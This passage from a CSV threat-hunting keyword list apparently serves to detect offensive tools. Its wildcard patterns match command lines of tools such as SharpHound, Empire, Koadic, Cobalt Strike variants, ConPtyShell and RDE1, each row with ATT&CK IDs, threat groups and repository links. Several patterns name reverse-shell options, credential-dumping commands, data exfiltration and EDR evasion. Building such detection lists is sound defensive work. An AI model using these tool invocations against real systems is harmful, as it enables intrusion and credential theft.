T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --collectionmethods ACL*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods ComputerOnly*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods Container*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods DCOM","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods DCOnly*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods GPOLocalGroup*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods Group*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods LocalGroup*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods LoggedOn*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods ObjectProps*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods PSRemote*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods RDP*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods Session*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --collectionmethods Trusts*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* com.blackh4t*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"* --command * --output payload*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"* -command *.exe* -technique ccmstp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"* common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* ComputerDefaults.exe*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"* -ComputerName -ServiceEXE *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"* -config modlishka.json *","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"* Configuring Windows Firewall rules to block EDR network access*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"* ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"* -consoleoutput -browsercredentials*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"* -consoleoutput -DomainRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"* -consoleoutput -Localrecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"* -ConType bind *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -ConType reverse *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --convert_idrsa_pub --publickey $HOME/.ssh/id_rsa.pub*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --copy-file --source-file *.docx --target-file *.docx --target-volume *","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"* core.payload *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"* core.stager *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"* couchdb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* couchdb-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --crack-status*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --crawl=*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* crawler.py -u http*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" +"* crde_arm_musl https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_armv7 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_debug https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_linux https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_linux_aarch64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_linux_x86_64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_macos https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_release https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_windows https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_windows_x64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* crde_windows_x86 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* --createpub -n 7828374823761928712873129873981723...12837182 -e 65537*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* Cred_Dump.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"* credentials /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* creds-summary.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* CrossC2 Listener*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"* CrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"* CrossC2Kit *","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 